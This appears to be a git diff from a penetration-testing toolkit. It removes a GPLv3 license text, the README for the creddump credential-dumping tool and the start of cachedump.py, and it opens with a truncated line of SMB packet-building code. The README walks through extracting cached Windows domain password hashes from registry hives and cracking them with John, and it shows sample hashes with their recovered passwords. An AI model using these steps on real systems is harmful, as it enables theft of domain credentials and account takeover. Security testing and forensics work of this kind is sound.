SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
## Packet len
- self.fields["andxoffset"] = struct.pack("
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
- Preamble
-
- The GNU General Public License is a free, copyleft license for
-software and other kinds of works.
-
- The licenses for most software and other practical works are designed
-to take away your freedom to share and change the works. By contrast,
-the GNU General Public License is intended to guarantee your freedom to
-share and change all versions of a program--to make sure it remains free
-software for all its users. We, the Free Software Foundation, use the
-GNU General Public License for most of our software; it applies also to
-any other work released this way by its authors. You can apply it to
-your programs, too.
-
- When we speak of free software, we are referring to freedom, not
-price. Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-them if you wish), that you receive source code or can get it if you
-want it, that you can change the software or use pieces of it in new
-free programs, and that you know you can do these things.
-
- To protect your rights, we need to prevent others from denying you
-these rights or asking you to surrender the rights. Therefore, you have
-certain responsibilities if you distribute copies of the software, or if
-you modify it: responsibilities to respect the freedom of others.
-
- For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must pass on to the recipients the same
-freedoms that you received. You must make sure that they, too, receive
-or can get the source code. And you must show them these terms so they
-know their rights.
-
- Developers that use the GNU GPL protect your rights with two steps:
-(1) assert copyright on the software, and (2) offer you this License
-giving you legal permission to copy, distribute and/or modify it.
-
- For the developers' and authors' protection, the GPL clearly explains
-that there is no warranty for this free software. For both users' and
-authors' sake, the GPL requires that modified versions be marked as
-changed, so that their problems will not be attributed erroneously to
-authors of previous versions.
-
- Some devices are designed to deny users access to install or run
-modified versions of the software inside them, although the manufacturer
-can do so. This is fundamentally incompatible with the aim of
-protecting users' freedom to change the software. The systematic
-pattern of such abuse occurs in the area of products for individuals to
-use, which is precisely where it is most unacceptable. Therefore, we
-have designed this version of the GPL to prohibit the practice for those
-products. If such problems arise substantially in other domains, we
-stand ready to extend this provision to those domains in future versions
-of the GPL, as needed to protect the freedom of users.
-
- Finally, every program is threatened constantly by software patents.
-States should not allow patents to restrict development and use of
-software on general-purpose computers, but in those that do, we wish to
-avoid the special danger that patents applied to a free program could
-make it effectively proprietary. To prevent this, the GPL assures that
-patents cannot be used to render the program non-free.
-
- The precise terms and conditions for copying, distribution and
-modification follow.
-
- TERMS AND CONDITIONS
-
- 0. Definitions.
-
- "This License" refers to version 3 of the GNU General Public License.
-
- "Copyright" also means copyright-like laws that apply to other kinds of
-works, such as semiconductor masks.
-
- "The Program" refers to any copyrightable work licensed under this
-License. Each licensee is addressed as "you". "Licensees" and
-"recipients" may be individuals or organizations.
-
- To "modify" a work means to copy from or adapt all or part of the work
-in a fashion requiring copyright permission, other than the making of an
-exact copy. The resulting work is called a "modified version" of the
-earlier work or a work "based on" the earlier work.
-
- A "covered work" means either the unmodified Program or a work based
-on the Program.
-
- To "propagate" a work means to do anything with it that, without
-permission, would make you directly or secondarily liable for
-infringement under applicable copyright law, except executing it on a
-computer or modifying a private copy. Propagation includes copying,
-distribution (with or without modification), making available to the
-public, and in some countries other activities as well.
-
- To "convey" a work means any kind of propagation that enables other
-parties to make or receive copies. Mere interaction with a user through
-a computer network, with no transfer of a copy, is not conveying.
-
- An interactive user interface displays "Appropriate Legal Notices"
-to the extent that it includes a convenient and prominently visible
-feature that (1) displays an appropriate copyright notice, and (2)
-tells the user that there is no warranty for the work (except to the
-extent that warranties are provided), that licensees may convey the
-work under this License, and how to view a copy of this License. If
-the interface presents a list of user commands or options, such as a
-menu, a prominent item in the list meets this criterion.
-
- 1. Source Code.
-
- The "source code" for a work means the preferred form of the work
-for making modifications to it. "Object code" means any non-source
-form of a work.
-
- A "Standard Interface" means an interface that either is an official
-standard defined by a recognized standards body, or, in the case of
-interfaces specified for a particular programming language, one that
-is widely used among developers working in that language.
-
- The "System Libraries" of an executable work include anything, other
-than the work as a whole, that (a) is included in the normal form of
-packaging a Major Component, but which is not part of that Major
-Component, and (b) serves only to enable use of the work with that
-Major Component, or to implement a Standard Interface for which an
-implementation is available to the public in source code form. A
-"Major Component", in this context, means a major essential component
-(kernel, window system, and so on) of the specific operating system
-(if any) on which the executable work runs, or a compiler used to
-produce the work, or an object code interpreter used to run it.
-
- The "Corresponding Source" for a work in object code form means all
-the source code needed to generate, install, and (for an executable
-work) run the object code and to modify the work, including scripts to
-control those activities. However, it does not include the work's
-System Libraries, or general-purpose tools or generally available free
-programs which are used unmodified in performing those activities but
-which are not part of the work. For example, Corresponding Source
-includes interface definition files associated with source files for
-the work, and the source code for shared libraries and dynamically
-linked subprograms that the work is specifically designed to require,
-such as by intimate data communication or control flow between those
-subprograms and other parts of the work.
-
- The Corresponding Source need not include anything that users
-can regenerate automatically from other parts of the Corresponding
-Source.
-
- The Corresponding Source for a work in source code form is that
-same work.
-
- 2. Basic Permissions.
-
- All rights granted under this License are granted for the term of
-copyright on the Program, and are irrevocable provided the stated
-conditions are met. This License explicitly affirms your unlimited
-permission to run the unmodified Program. The output from running a
-covered work is covered by this License only if the output, given its
-content, constitutes a covered work. This License acknowledges your
-rights of fair use or other equivalent, as provided by copyright law.
-
- You may make, run and propagate covered works that you do not
-convey, without conditions so long as your license otherwise remains
-in force. You may convey covered works to others for the sole purpose
-of having them make modifications exclusively for you, or provide you
-with facilities for running those works, provided that you comply with
-the terms of this License in conveying all material for which you do
-not control copyright. Those thus making or running the covered works
-for you must do so exclusively on your behalf, under your direction
-and control, on terms that prohibit them from making any copies of
-your copyrighted material outside their relationship with you.
-
- Conveying under any other circumstances is permitted solely under
-the conditions stated below. Sublicensing is not allowed; section 10
-makes it unnecessary.
-
- 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
-
- No covered work shall be deemed part of an effective technological
-measure under any applicable law fulfilling obligations under article
-11 of the WIPO copyright treaty adopted on 20 December 1996, or
-similar laws prohibiting or restricting circumvention of such
-measures.
-
- When you convey a covered work, you waive any legal power to forbid
-circumvention of technological measures to the extent such circumvention
-is effected by exercising rights under this License with respect to
-the covered work, and you disclaim any intention to limit operation or
-modification of the work as a means of enforcing, against the work's
-users, your or third parties' legal rights to forbid circumvention of
-technological measures.
-
- 4. Conveying Verbatim Copies.
-
- You may convey verbatim copies of the Program's source code as you
-receive it, in any medium, provided that you conspicuously and
-appropriately publish on each copy an appropriate copyright notice;
-keep intact all notices stating that this License and any
-non-permissive terms added in accord with section 7 apply to the code;
-keep intact all notices of the absence of any warranty; and give all
-recipients a copy of this License along with the Program.
-
- You may charge any price or no price for each copy that you convey,
-and you may offer support or warranty protection for a fee.
-
- 5. Conveying Modified Source Versions.
-
- You may convey a work based on the Program, or the modifications to
-produce it from the Program, in the form of source code under the
-terms of section 4, provided that you also meet all of these conditions:
-
- a) The work must carry prominent notices stating that you modified
- it, and giving a relevant date.
-
- b) The work must carry prominent notices stating that it is
- released under this License and any conditions added under section
- 7. This requirement modifies the requirement in section 4 to
- "keep intact all notices".
-
- c) You must license the entire work, as a whole, under this
- License to anyone who comes into possession of a copy. This
- License will therefore apply, along with any applicable section 7
- additional terms, to the whole of the work, and all its parts,
- regardless of how they are packaged. This License gives no
- permission to license the work in any other way, but it does not
- invalidate such permission if you have separately received it.
-
- d) If the work has interactive user interfaces, each must display
- Appropriate Legal Notices; however, if the Program has interactive
- interfaces that do not display Appropriate Legal Notices, your
- work need not make them do so.
-
- A compilation of a covered work with other separate and independent
-works, which are not by their nature extensions of the covered work,
-and which are not combined with it such as to form a larger program,
-in or on a volume of a storage or distribution medium, is called an
-"aggregate" if the compilation and its resulting copyright are not
-used to limit the access or legal rights of the compilation's users
-beyond what the individual works permit. Inclusion of a covered work
-in an aggregate does not cause this License to apply to the other
-parts of the aggregate.
-
- 6. Conveying Non-Source Forms.
-
- You may convey a covered work in object code form under the terms
-of sections 4 and 5, provided that you also convey the
-machine-readable Corresponding Source under the terms of this License,
-in one of these ways:
-
- a) Convey the object code in, or embodied in, a physical product
- (including a physical distribution medium), accompanied by the
- Corresponding Source fixed on a durable physical medium
- customarily used for software interchange.
-
- b) Convey the object code in, or embodied in, a physical product
- (including a physical distribution medium), accompanied by a
- written offer, valid for at least three years and valid for as
- long as you offer spare parts or customer support for that product
- model, to give anyone who possesses the object code either (1) a
- copy of the Corresponding Source for all the software in the
- product that is covered by this License, on a durable physical
- medium customarily used for software interchange, for a price no
- more than your reasonable cost of physically performing this
- conveying of source, or (2) access to copy the
- Corresponding Source from a network server at no charge.
-
- c) Convey individual copies of the object code with a copy of the
- written offer to provide the Corresponding Source. This
- alternative is allowed only occasionally and noncommercially, and
- only if you received the object code with such an offer, in accord
- with subsection 6b.
-
- d) Convey the object code by offering access from a designated
- place (gratis or for a charge), and offer equivalent access to the
- Corresponding Source in the same way through the same place at no
- further charge. You need not require recipients to copy the
- Corresponding Source along with the object code. If the place to
- copy the object code is a network server, the Corresponding Source
- may be on a different server (operated by you or a third party)
- that supports equivalent copying facilities, provided you maintain
- clear directions next to the object code saying where to find the
- Corresponding Source. Regardless of what server hosts the
- Corresponding Source, you remain obligated to ensure that it is
- available for as long as needed to satisfy these requirements.
-
- e) Convey the object code using peer-to-peer transmission, provided
- you inform other peers where the object code and Corresponding
- Source of the work are being offered to the general public at no
- charge under subsection 6d.
-
- A separable portion of the object code, whose source code is excluded
-from the Corresponding Source as a System Library, need not be
-included in conveying the object code work.
-
- A "User Product" is either (1) a "consumer product", which means any
-tangible personal property which is normally used for personal, family,
-or household purposes, or (2) anything designed or sold for incorporation
-into a dwelling. In determining whether a product is a consumer product,
-doubtful cases shall be resolved in favor of coverage. For a particular
-product received by a particular user, "normally used" refers to a
-typical or common use of that class of product, regardless of the status
-of the particular user or of the way in which the particular user
-actually uses, or expects or is expected to use, the product. A product
-is a consumer product regardless of whether the product has substantial
-commercial, industrial or non-consumer uses, unless such uses represent
-the only significant mode of use of the product.
-
- "Installation Information" for a User Product means any methods,
-procedures, authorization keys, or other information required to install
-and execute modified versions of a covered work in that User Product from
-a modified version of its Corresponding Source. The information must
-suffice to ensure that the continued functioning of the modified object
-code is in no case prevented or interfered with solely because
-modification has been made.
-
- If you convey an object code work under this section in, or with, or
-specifically for use in, a User Product, and the conveying occurs as
-part of a transaction in which the right of possession and use of the
-User Product is transferred to the recipient in perpetuity or for a
-fixed term (regardless of how the transaction is characterized), the
-Corresponding Source conveyed under this section must be accompanied
-by the Installation Information. But this requirement does not apply
-if neither you nor any third party retains the ability to install
-modified object code on the User Product (for example, the work has
-been installed in ROM).
-
- The requirement to provide Installation Information does not include a
-requirement to continue to provide support service, warranty, or updates
-for a work that has been modified or installed by the recipient, or for
-the User Product in which it has been modified or installed. Access to a
-network may be denied when the modification itself materially and
-adversely affects the operation of the network or violates the rules and
-protocols for communication across the network.
-
- Corresponding Source conveyed, and Installation Information provided,
-in accord with this section must be in a format that is publicly
-documented (and with an implementation available to the public in
-source code form), and must require no special password or key for
-unpacking, reading or copying.
-
- 7. Additional Terms.
-
- "Additional permissions" are terms that supplement the terms of this
-License by making exceptions from one or more of its conditions.
-Additional permissions that are applicable to the entire Program shall
-be treated as though they were included in this License, to the extent
-that they are valid under applicable law. If additional permissions
-apply only to part of the Program, that part may be used separately
-under those permissions, but the entire Program remains governed by
-this License without regard to the additional permissions.
-
- When you convey a copy of a covered work, you may at your option
-remove any additional permissions from that copy, or from any part of
-it. (Additional permissions may be written to require their own
-removal in certain cases when you modify the work.) You may place
-additional permissions on material, added by you to a covered work,
-for which you have or can give appropriate copyright permission.
-
- Notwithstanding any other provision of this License, for material you
-add to a covered work, you may (if authorized by the copyright holders of
-that material) supplement the terms of this License with terms:
-
- a) Disclaiming warranty or limiting liability differently from the
- terms of sections 15 and 16 of this License; or
-
- b) Requiring preservation of specified reasonable legal notices or
- author attributions in that material or in the Appropriate Legal
- Notices displayed by works containing it; or
-
- c) Prohibiting misrepresentation of the origin of that material, or
- requiring that modified versions of such material be marked in
- reasonable ways as different from the original version; or
-
- d) Limiting the use for publicity purposes of names of licensors or
- authors of the material; or
-
- e) Declining to grant rights under trademark law for use of some
- trade names, trademarks, or service marks; or
-
- f) Requiring indemnification of licensors and authors of that
- material by anyone who conveys the material (or modified versions of
- it) with contractual assumptions of liability to the recipient, for
- any liability that these contractual assumptions directly impose on
- those licensors and authors.
-
- All other non-permissive additional terms are considered "further
-restrictions" within the meaning of section 10. If the Program as you
-received it, or any part of it, contains a notice stating that it is
-governed by this License along with a term that is a further
-restriction, you may remove that term. If a license document contains
-a further restriction but permits relicensing or conveying under this
-License, you may add to a covered work material governed by the terms
-of that license document, provided that the further restriction does
-not survive such relicensing or conveying.
-
- If you add terms to a covered work in accord with this section, you
-must place, in the relevant source files, a statement of the
-additional terms that apply to those files, or a notice indicating
-where to find the applicable terms.
-
- Additional terms, permissive or non-permissive, may be stated in the
-form of a separately written license, or stated as exceptions;
-the above requirements apply either way.
-
- 8. Termination.
-
- You may not propagate or modify a covered work except as expressly
-provided under this License. Any attempt otherwise to propagate or
-modify it is void, and will automatically terminate your rights under
-this License (including any patent licenses granted under the third
-paragraph of section 11).
-
- However, if you cease all violation of this License, then your
-license from a particular copyright holder is reinstated (a)
-provisionally, unless and until the copyright holder explicitly and
-finally terminates your license, and (b) permanently, if the copyright
-holder fails to notify you of the violation by some reasonable means
-prior to 60 days after the cessation.
-
- Moreover, your license from a particular copyright holder is
-reinstated permanently if the copyright holder notifies you of the
-violation by some reasonable means, this is the first time you have
-received notice of violation of this License (for any work) from that
-copyright holder, and you cure the violation prior to 30 days after
-your receipt of the notice.
-
- Termination of your rights under this section does not terminate the
-licenses of parties who have received copies or rights from you under
-this License. If your rights have been terminated and not permanently
-reinstated, you do not qualify to receive new licenses for the same
-material under section 10.
-
- 9. Acceptance Not Required for Having Copies.
-
- You are not required to accept this License in order to receive or
-run a copy of the Program. Ancillary propagation of a covered work
-occurring solely as a consequence of using peer-to-peer transmission
-to receive a copy likewise does not require acceptance. However,
-nothing other than this License grants you permission to propagate or
-modify any covered work. These actions infringe copyright if you do
-not accept this License. Therefore, by modifying or propagating a
-covered work, you indicate your acceptance of this License to do so.
-
- 10. Automatic Licensing of Downstream Recipients.
-
- Each time you convey a covered work, the recipient automatically
-receives a license from the original licensors, to run, modify and
-propagate that work, subject to this License. You are not responsible
-for enforcing compliance by third parties with this License.
-
- An "entity transaction" is a transaction transferring control of an
-organization, or substantially all assets of one, or subdividing an
-organization, or merging organizations. If propagation of a covered
-work results from an entity transaction, each party to that
-transaction who receives a copy of the work also receives whatever
-licenses to the work the party's predecessor in interest had or could
-give under the previous paragraph, plus a right to possession of the
-Corresponding Source of the work from the predecessor in interest, if
-the predecessor has it or can get it with reasonable efforts.
-
- You may not impose any further restrictions on the exercise of the
-rights granted or affirmed under this License. For example, you may
-not impose a license fee, royalty, or other charge for exercise of
-rights granted under this License, and you may not initiate litigation
-(including a cross-claim or counterclaim in a lawsuit) alleging that
-any patent claim is infringed by making, using, selling, offering for
-sale, or importing the Program or any portion of it.
-
- 11. Patents.
-
- A "contributor" is a copyright holder who authorizes use under this
-License of the Program or a work on which the Program is based. The
-work thus licensed is called the contributor's "contributor version".
-
- A contributor's "essential patent claims" are all patent claims
-owned or controlled by the contributor, whether already acquired or
-hereafter acquired, that would be infringed by some manner, permitted
-by this License, of making, using, or selling its contributor version,
-but do not include claims that would be infringed only as a
-consequence of further modification of the contributor version. For
-purposes of this definition, "control" includes the right to grant
-patent sublicenses in a manner consistent with the requirements of
-this License.
-
- Each contributor grants you a non-exclusive, worldwide, royalty-free
-patent license under the contributor's essential patent claims, to
-make, use, sell, offer for sale, import and otherwise run, modify and
-propagate the contents of its contributor version.
-
- In the following three paragraphs, a "patent license" is any express
-agreement or commitment, however denominated, not to enforce a patent
-(such as an express permission to practice a patent or covenant not to
-sue for patent infringement). To "grant" such a patent license to a
-party means to make such an agreement or commitment not to enforce a
-patent against the party.
-
- If you convey a covered work, knowingly relying on a patent license,
-and the Corresponding Source of the work is not available for anyone
-to copy, free of charge and under the terms of this License, through a
-publicly available network server or other readily accessible means,
-then you must either (1) cause the Corresponding Source to be so
-available, or (2) arrange to deprive yourself of the benefit of the
-patent license for this particular work, or (3) arrange, in a manner
-consistent with the requirements of this License, to extend the patent
-license to downstream recipients. "Knowingly relying" means you have
-actual knowledge that, but for the patent license, your conveying the
-covered work in a country, or your recipient's use of the covered work
-in a country, would infringe one or more identifiable patents in that
-country that you have reason to believe are valid.
-
- If, pursuant to or in connection with a single transaction or
-arrangement, you convey, or propagate by procuring conveyance of, a
-covered work, and grant a patent license to some of the parties
-receiving the covered work authorizing them to use, propagate, modify
-or convey a specific copy of the covered work, then the patent license
-you grant is automatically extended to all recipients of the covered
-work and works based on it.
-
- A patent license is "discriminatory" if it does not include within
-the scope of its coverage, prohibits the exercise of, or is
-conditioned on the non-exercise of one or more of the rights that are
-specifically granted under this License. You may not convey a covered
-work if you are a party to an arrangement with a third party that is
-in the business of distributing software, under which you make payment
-to the third party based on the extent of your activity of conveying
-the work, and under which the third party grants, to any of the
-parties who would receive the covered work from you, a discriminatory
-patent license (a) in connection with copies of the covered work
-conveyed by you (or copies made from those copies), or (b) primarily
-for and in connection with specific products or compilations that
-contain the covered work, unless you entered into that arrangement,
-or that patent license was granted, prior to 28 March 2007.
-
- Nothing in this License shall be construed as excluding or limiting
-any implied license or other defenses to infringement that may
-otherwise be available to you under applicable patent law.
-
- 12. No Surrender of Others' Freedom.
-
- If conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License. If you cannot convey a
-covered work so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you may
-not convey it at all. For example, if you agree to terms that obligate you
-to collect a royalty for further conveying from those to whom you convey
-the Program, the only way you could satisfy both those terms and this
-License would be to refrain entirely from conveying the Program.
-
- 13. Use with the GNU Affero General Public License.
-
- Notwithstanding any other provision of this License, you have
-permission to link or combine any covered work with a work licensed
-under version 3 of the GNU Affero General Public License into a single
-combined work, and to convey the resulting work. The terms of this
-License will continue to apply to the part which is the covered work,
-but the special requirements of the GNU Affero General Public License,
-section 13, concerning interaction through a network will apply to the
-combination as such.
-
- 14. Revised Versions of this License.
-
- The Free Software Foundation may publish revised and/or new versions of
-the GNU General Public License from time to time. Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
- Each version is given a distinguishing version number. If the
-Program specifies that a certain numbered version of the GNU General
-Public License "or any later version" applies to it, you have the
-option of following the terms and conditions either of that numbered
-version or of any later version published by the Free Software
-Foundation. If the Program does not specify a version number of the
-GNU General Public License, you may choose any version ever published
-by the Free Software Foundation.
-
- If the Program specifies that a proxy can decide which future
-versions of the GNU General Public License can be used, that proxy's
-public statement of acceptance of a version permanently authorizes you
-to choose that version for the Program.
-
- Later license versions may give you additional or different
-permissions. However, no additional obligations are imposed on any
-author or copyright holder as a result of your choosing to follow a
-later version.
-
- 15. Disclaimer of Warranty.
-
- THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
-APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
-HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
-OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
-IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
-ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
- 16. Limitation of Liability.
-
- IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
-THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
-GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
-USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
-DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
-PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
-EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
-SUCH DAMAGES.
-
- 17. Interpretation of Sections 15 and 16.
-
- If the disclaimer of warranty and limitation of liability provided
-above cannot be given local legal effect according to their terms,
-reviewing courts shall apply local law that most closely approximates
-an absolute waiver of all civil liability in connection with the
-Program, unless a warranty or assumption of liability accompanies a
-copy of the Program in return for a fee.
-
- END OF TERMS AND CONDITIONS
-
- How to Apply These Terms to Your New Programs
-
- If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
- To do so, attach the following notices to the program. It is safest
-to attach them to the start of each source file to most effectively
-state the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-
- Copyright (C)
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation, either version 3 of the License, or
- (at your option) any later version.
-
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- GNU General Public License for more details.
-
- You should have received a copy of the GNU General Public License
- along with this program. If not, see .
-
-Also add information on how to contact you by electronic and paper mail.
-
- If the program does terminal interaction, make it output a short
-notice like this when it starts in an interactive mode:
-
- Copyright (C)
- This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
- This is free software, and you are welcome to redistribute it
- under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License. Of course, your program's commands
-might be different; for a GUI interface, you would use an "about box".
-
- You should also get your employer (if you work as a programmer) or school,
-if any, to sign a "copyright disclaimer" for the program, if necessary.
-For more information on this, and how to apply and follow the GNU GPL, see
-.
-
- The GNU General Public License does not permit incorporating your program
-into proprietary programs. If your program is a subroutine library, you
-may consider it more useful to permit linking proprietary applications with
-the library. If this is what you want to do, use the GNU Lesser General
-Public License instead of this License. But first, please read
-.
diff --git a/tools/MultiRelay/creddump/README b/tools/MultiRelay/creddump/README
deleted file mode 100644
index e69de29..0000000
diff --git a/tools/MultiRelay/creddump/README.md b/tools/MultiRelay/creddump/README.md
deleted file mode 100644
index 8b5b80c..0000000
--- a/tools/MultiRelay/creddump/README.md
+++ /dev/null
@@ -1,182 +0,0 @@
-#Information
-This repo is for my modifications to the original 'creddump' program available
-at:
-
-https://code.google.com/p/creddump/
-
-I did not write the original program.
-
-I have combined many patches and fixes I have seen from different forums and
-user suggestions, as well as modified the usage to make it a little more clear.
-
-I followed patches and fixes from the following links:
-
-* https://code.google.com/p/creddump/issues/detail?id=4
-* https://code.google.com/p/volatility/issues/detail?id=92
-
-Enjoy!
-Ronnie Flathers (@ropnop)
-
-
-###Usage
-Mount a Windows 7/Vista partition:
-```
-# mkdir /mnt/win
-# ntfs-3g /dev/sda1 /mnt/win
-```
-
-Run cachedump.py on the SYSTEM and SECURITY hives to extract cached domain creds:
-```
-# ./cachedump.py
-usage: ./cachedump.py
-
-Example (Windows Vista/7):
-./cachedump.py /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true
-
-Example (Windows XP):
-./cachedump.py /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false
-
-# ./cachedump.py /mnt/win/Windows/System32/config/SYSTEM /mnt/win/Windows/System32/config/SECURITY true |tee hashes
-nharpsis:6b29dfa157face3f3d8db489aec5cc12:acme:acme.local
-god:25bd785b8ff1b7fa3a9b9e069a5e7de7:acme:acme.local
-```
-
-If you want to crack the hashes and have a good wordlist, John can be used. The hashes are in the 'mscash2' format:
-```
-# john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt hashes
-Loaded 2 password hashes with 2 different salts (M$ Cache Hash 2 (DCC2) PBKDF2-HMAC-SHA-1 [128/128 SSE2 intrinsics 8x])
-g0d (god)
-Welcome1! (nharpsis)
-```
-
-We now have the passwords for two domain users. Note: these passwords are really simple and I knew they were in the wordlist I used. Normally if you want to actually bruteforce the passwords, I wouldn't recommend John. Pull the hashes and use a GPU powered cracking box with oclHashcat.
-
-
-####Below is the original README file
-
-
-OVERVIEW
-
-creddump is a python tool to extract various credentials and secrets from
-Windows registry hives. It currently extracts:
-* LM and NT hashes (SYSKEY protected)
-* Cached domain passwords
-* LSA secrets
-
-It essentially performs all the functions that bkhive/samdump2,
-cachedump, and lsadump2 do, but in a platform-independent way.
-
-It is also the first tool that does all of these things in an offline
-way (actually, Cain & Abel does, but is not open source and is only
-available on Windows).
-
-REQUIREMENTS
-
-alldump has only been tested on python 2.5. It should work on 2.4 as
-well, but will likely need modification before it will work on 2.3 or
-below.
-
-python-crypto is required for its MD5/DES/RC4 support. To obtain it,
-see: http://www.amk.ca/python/code/crypto
-
-For lsadump: system and SECURITY hives
-For cachedump: system and SECURITY hives
-For pwdump: system and SAM hives
-
-USAGE
-
-Dump cached domain hashes:
- usage: ./cachedump.py
-
-Dump LSA secrets:
- usage: ./lsadump.py
-
-Dump local password hashes:
- usage: ./pwdump.py
-
-FEATURES
-
-* Platform independent operation. The only inputs are the hive files
- from the system--we don't rely on any Windows functionality at all.
-* Open-source and (hopefully!) readble implementations of Windows
- obfuscation algorithms used to protect LSA secrets, cached domain
- passwords, and
-* A reasonably forgiving registry file parser in pure Python. Look
- through framework/types.py and framework/win32/rawreg.py to see how it
- works.
-* The first complete open-source implementation of advapi32's
- SystemFunction005. The version in the Wine source code does not
- appear to allow for keys longer than 7 bytes, while the Windows
- version (and this version) does. See decrypt_secret() in
- framework/win32/lsasecrets.py
-
-AUTHOR
-
-creddump is written by Brendan Dolan-Gavitt (bdolangavitt@wesleyan.edu).
-For more information on Syskey, LSA secrets, cached domain credentials,
-and lots of information on volatile memory forensics and reverse
-engineering, check out:
-
-http://moyix.blogspot.com/
-
-CREDITS
-* AAron Walters. Much of the data type parsing code is taken from
- Volatility, an excellent memory analysis framework written in Python.
- He's also a really nice guy, and has helped me out a lot in my
- research.
-
- https://www.volatilesystems.com/default/volatility
-
-* Massimiliano Montoro (mao), for reversing the mechanism Windows uses
- to derive the LSA key so that it can be computed directly from the
- hive files, as decribed in this post:
-
- http://oxid.netsons.org/phpBB2/viewtopic.php?t=149
- http://www.oxid.it/
-
-* Jeremy Allison, for the details of the obfuscation applied to password
- hashes in the SAM, as implemented in the original pwdump.
-
- http://us4.samba.org/samba/ftp/pwdump/
-
-* Nicola Cuomo, for his excellent description of the syskey mechanism
- and how it is used to encrypt the SAM in Windows 2000 and above.
-
- http://www.studenti.unina.it/~ncuomo/syskey/
-
-* Eyas[at]xfocus.org, for x_dialupass2.cpp, which demonstrates how to
- read LSA secrets directly from the registry, given the LSA key.
-
- http://www.xfocus.net/articles/200411/749.html
-
- [Note: the above is in Chinese, but quite comprehensible if you use
- Google Translate and can read C ;)]
-
-* Nicholas Ruff, for his perl implementation of des_set_odd_parity,
- which he apparently took from SSLEAY:
-
- http://seclists.org/pen-test/2005/Jan/0180.html
-
-* Arnaud Pilon, for the details of how to retrieve cached domain, as
- implemented in cachedump.
-
- http://www.securiteam.com/tools/5JP0I2KFPA.html
-
-* S�bastien Ke, for his cute hexdump recipe:
-
- http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
-
-LICENSE
-
-This program is free software: you can redistribute it and/or modify
-it under the terms of the GNU General Public License as published by
-the Free Software Foundation, either version 3 of the License, or
-(at your option) any later version.
-
-This program is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-GNU General Public License for more details.
-
-You should have received a copy of the GNU General Public License
-along with this program. If not, see .
diff --git a/tools/MultiRelay/creddump/cachedump.py b/tools/MultiRelay/creddump/cachedump.py
deleted file mode 100755
index c059699..0000000
--- a/tools/MultiRelay/creddump/cachedump.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python
-
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump. If not, see .
-
-# pylint: disable=invalid-name,missing-docstring
-
-"""
-@author: Brendan Dolan-Gavitt
-@license: GNU General Public License 2.0 or later
-@contact: bdolangavitt@wesleyan.edu
-"""
-
-import sys
-from framework.win32.domcachedump import dump_file_hashes
-
-
-def showUsage():
- print("usage: %s " % sys.argv[0])
- print("\nExample (Windows Vista/7):")
- print("%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0])
